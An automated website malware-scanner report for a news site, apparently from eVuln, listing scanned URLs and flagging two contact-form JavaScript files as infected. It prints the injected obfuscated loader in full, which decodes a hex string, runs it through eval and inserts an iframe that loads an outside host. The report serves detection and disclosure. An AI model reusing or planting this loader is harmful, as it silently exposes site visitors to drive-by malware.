New scan:

Malware Scanner report for goldcoastgazette.net

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://goldcoastgazette.net/
200 OK
Content-Length: 6082
Content-Type: text/html
clean
http://goldcoastgazette.net/media/system/js/mootools-core.js
200 OK
Content-Length: 96362
Content-Type: application/javascript
clean
http://goldcoastgazette.net/media/system/js/core.js
200 OK
Content-Length: 4784
Content-Type: application/javascript
clean
http://goldcoastgazette.net/media/system/js/caption.js
200 OK
Content-Length: 729
Content-Type: application/javascript
clean
http://goldcoastgazette.net/media/system/js/mootools-more.js
200 OK
Content-Length: 238331
Content-Type: application/javascript
clean
http://goldcoastgazette.net/templates/gazette20130306a/jquery.js
200 OK
Content-Length: 92793
Content-Type: application/javascript
clean
http://goldcoastgazette.net/templates/gazette20130306a/script.js
200 OK
Content-Length: 46654
Content-Type: application/javascript
clean
http://goldcoastgazette.net/templates/gazette20130306a/script.responsive.js
200 OK
Content-Length: 17014
Content-Type: application/javascript
clean
http://goldcoastgazette.net/index.php/subscribe
200 OK
Content-Length: 6349
Content-Type: text/html
clean
http://goldcoastgazette.net/index.php/contact-us
200 OK
Content-Length: 15458
Content-Type: text/html
clean
http://goldcoastgazette.net/index.php?option=com_foxcontact&view=loader&owner=module&id=88&type=js&filename=jtext
200 OK
Content-Length: 4896
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCh"+"a"+"rCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,61,5b,5d,5d,6a,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,61,5b,5d,5d,6a,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,59,66,61,65,59,6c,5d,5c,62,6d,66,63,5d,5d,72,26,5b,67,6
... 3437 bytes are skipped ...
,6c,67,6a,26,5b,67,67,63,61,5d,3d,66,59,5a,64,5d,5c,21,5,2,73,5,2,61,5e,20,3f,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6c,5d,5c,57,6d,69,1f,21,35,35,2d,2d,21,73,75,5d,64,6b,5d,73,4b,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6c,5d,5c,57,6d,69,1f,24,18,1f,2d,2d,1f,24,18,1f,29,1f,24,18,1f,27,1f,21,33,5,2,5,2,72,72,72,5e,5e,5e,20,21,33,5,2,75,5,2,75"["split"](",");}w=f;s=[];if(window.document)for(i=2-2;-i+1405!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e("0x"+(w[j]))+8);}xz=e;if(window.document)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN

http://goldcoastgazette.net/components/com_foxcontact/js/fileuploader.js
200 OK
Content-Length: 17468
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCh"+"a"+"rCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,61,5b,5d,5d,6a,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,61,5b,5d,5d,6a,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,59,66,61,65,59,6c,5d,5c,62,6d,66,63,5d,5d,72,26,5b,67,6
... 3437 bytes are skipped ...
,6c,67,6a,26,5b,67,67,63,61,5d,3d,66,59,5a,64,5d,5c,21,5,2,73,5,2,61,5e,20,3f,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6c,5d,5c,57,6d,69,1f,21,35,35,2d,2d,21,73,75,5d,64,6b,5d,73,4b,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6c,5d,5c,57,6d,69,1f,24,18,1f,2d,2d,1f,24,18,1f,29,1f,24,18,1f,27,1f,21,33,5,2,5,2,72,72,72,5e,5e,5e,20,21,33,5,2,75,5,2,75"["split"](",");}w=f;s=[];if(window.document)for(i=2-2;-i+1405!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e("0x"+(w[j]))+8);}xz=e;if(window.document)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN

http://goldcoastgazette.net/index.php/admin
200 OK
Content-Length: 5162
Content-Type: text/html
clean
http://goldcoastgazette.net/index.php/admin?view=reset
200 OK
Content-Length: 5351
Content-Type: text/html
clean
http://goldcoastgazette.net/media/system/js/validate.js
200 OK
Content-Length: 2950
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: goldcoastgazette.net

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 25 Dec 2014 15:23:49 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: d2b420f727932ecedfe93c10f7a3fdab=f35c86ddcb94e1613567cf6cc1644878; path=/
Set-Cookie: TS0194eee0=01e93bdf0ff10a6378e2ca88363fddd4b96770d3bc1a3b5c8a481acfb0ad1783c10f819ece25cd0794dfca08bcdb10f3fbf296df48; Path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: goldcoastgazette.net
Referer: http://www.google.com/search?q=goldcoastgazette.net

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=goldcoastgazette.net

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://goldcoastgazette.net/

Result: goldcoastgazette.net is not infected or malware details are not published yet.